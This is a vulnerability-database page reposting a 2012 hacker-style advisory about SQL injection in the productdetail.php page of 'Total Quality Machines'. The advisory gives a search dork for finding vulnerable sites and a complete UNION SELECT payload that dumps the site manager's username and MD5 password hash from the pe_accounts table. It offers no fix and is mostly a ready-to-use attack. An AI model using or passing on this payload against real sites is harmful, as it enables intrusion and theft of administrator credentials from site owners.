Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27958
HistoryApr 23, 2012 - 12:00 a.m.

Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities

2012-04-2300:00:00
vulners.com
45
JSON

##################################################################

Title : Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities

Discovered By: CrAzY CrAcKeR

Home : Null

Email : [email protected]

date : 14/4/2012

d0rk:- "Total Quality Machines"

##################################################################
##################################################################

±±±±±±±±±±+

–+CrAzY CrAcKeR±-

±±±±±±±±±±+

##################################################################
##################################################################

Example:-

[-] http://www.???.com/productdetail.php?id=(sql)

[-] Injection code… ( -1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts )

[-] http://www.???.com/productdetail.php?id=–1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts

[-] you see now password (md5) and the name of the site manager

####################################################################

Greeting to my friend A7eb Alwrd

####################################################################

JSON